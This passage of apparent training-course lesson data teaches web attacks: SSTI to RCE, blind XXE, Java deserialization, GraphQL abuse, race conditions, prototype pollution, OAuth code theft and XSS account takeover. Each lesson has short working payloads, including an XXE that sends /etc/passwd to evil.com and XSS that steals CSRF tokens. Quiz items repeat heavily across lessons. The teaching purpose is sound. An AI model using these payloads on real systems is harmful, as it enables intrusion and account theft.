(XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-ssti-rce","cat":"Web Application","title":"SSTI to RCE Chain","diff":4,"xp":250,"intro":"Template injection to full code execution.","sections":[{"type":"text","content":"Each engine has a different path to RCE through class traversal."},{"type":"code","lang":"python","content":"# Jinja2\n{{config.__class__.__init__.__globals__['os'].popen('id').read()}}\n# Twig\n{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSTI detection starts with...","opts":["SQL injection","Injecting {{7*7}} and checking for 49","Port scanning","Brute force"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-blind-xxe","cat":"Web Application","title":"Blind XXE Out-of-Band","diff":4,"xp":250,"intro":"Exfiltrate data when XXE output isn't visible.","sections":[{"type":"text","content":"Use external DTD to read files and send data to your server."},{"type":"code","lang":"xml","content":"<!ENTITY % file SYSTEM 'file:///etc/passwd'>\n<!ENTITY % eval '<!ENTITY &#x25; exfil SYSTEM \"http://evil.com/?d=%file;\">'>\n%eval;\n%exfil;"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Blind XXE exfiltrates via...","opts":["Direct response","Out-of-band HTTP to attacker server","Timing","Error messages"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-deserialization","cat":"Web Application","title":"Java Deserialization RCE","diff":4,"xp":300,"intro":"Exploit unsafe deserialization with gadget chains.","sections":[{"type":"text","content":"ObjectInputStream.readObject() with Commons Collections = RCE."},{"type":"code","lang":"bash","content":"java -jar ysoserial.jar CommonsCollections1 'id' | base64\n# Look for rO0AB in requests (Java serialized data)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Java deserialization needs...","opts":["SQL injection","Vulnerable gadget classes on the classpath","Physical access","Admin creds"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-graphql-deep","cat":"Web Application","title":"GraphQL Deep Exploitation","diff":4,"xp":250,"intro":"Beyond introspection: batching, nested DoS, mutation abuse.","sections":[{"type":"text","content":"Batch queries bypass rate limits, nested queries DoS, unauthorized mutations escalate."},{"type":"code","lang":"bash","content":"# Batch: [{\"query\":\"mutation{login(u:'a',p:'1')}\"},{\"query\":\"mutation{login(u:'a',p:'2')}\"}]\n# DoS: {users{posts{comments{user{posts}}}}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"GraphQL batching bypasses...","opts":["Auth","Per-request rate limiting","Encryption","CORS"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-race-cond","cat":"Web Application","title":"Web Race Conditions","diff":3,"xp":300,"intro":"Concurrent requests bypass business logic.","sections":[{"type":"text","content":"Send duplicate requests simultaneously to exploit check-then-act gaps."},{"type":"code","lang":"python","content":"import threading, requests\ndef redeem():\n    requests.post(url, json={'code':'DISC50'}, headers=h)\nthreads = [threading.Thread(target=redeem) for _ in range(50)]\nfor t in threads: t.start()"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Race conditions exploit...","opts":["Weak encryption","Non-atomic check-then-act operations","Missing input validation","SQL errors"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-proto-pollution","cat":"Web Application","title":"Prototype Pollution","diff":3,"xp":300,"intro":"Modify Object.prototype to affect all objects.","sections":[{"type":"text","content":"Deep merge with __proto__ injects properties into every object."},{"type":"code","lang":"javascript","content":"const payload = JSON.parse('{\"__proto__\":{\"isAdmin\":true}}');\nmerge({}, payload);\nconst user = {};\nconsole.log(user.isAdmin); // true!"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Prototype pollution affects...","opts":["One object","Every object in the application","Arrays only","Strings only"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-oauth-theft","cat":"Web Application","title":"OAuth Token Theft","diff":3,"xp":200,"intro":"Chain open redirect with OAuth to steal auth codes.","sections":[{"type":"text","content":"Redirect the authorization code to your server via open redirect."},{"type":"code","lang":"bash","content":"https://auth.target.com/authorize?client_id=legit&redirect_uri=https://target.com/redirect?url=https://evil.com&response_type=code"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"OAuth code theft needs...","opts":["SQL injection","An open redirect within the allowed redirect_uri","Physical access","Buffer overflow"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xss-chain","cat":"Web Application","title":"XSS to Account Takeover","diff":5,"xp":300,"intro":"Chain stored XSS into full account takeover.","sections":[{"type":"text","content":"Steal CSRF tokens, add attacker email, trigger password reset."},{"type":"code","lang":"javascript","content":"fetch('/settings').then(r=>r.text()).then(html=>{\n  const token = html.match(/csrf.*?value=\"([^\"]+)\"/)[1];\n  fetch('/settings/email',{method:'POST',body:'email=evil@evil.com&csrf='+token});\n});"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XSS bypasses HttpOnly by...","opts":["Cracking cookies","Making authenticated requests from the victim's browser","Decrypting them","Reading from disk"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making 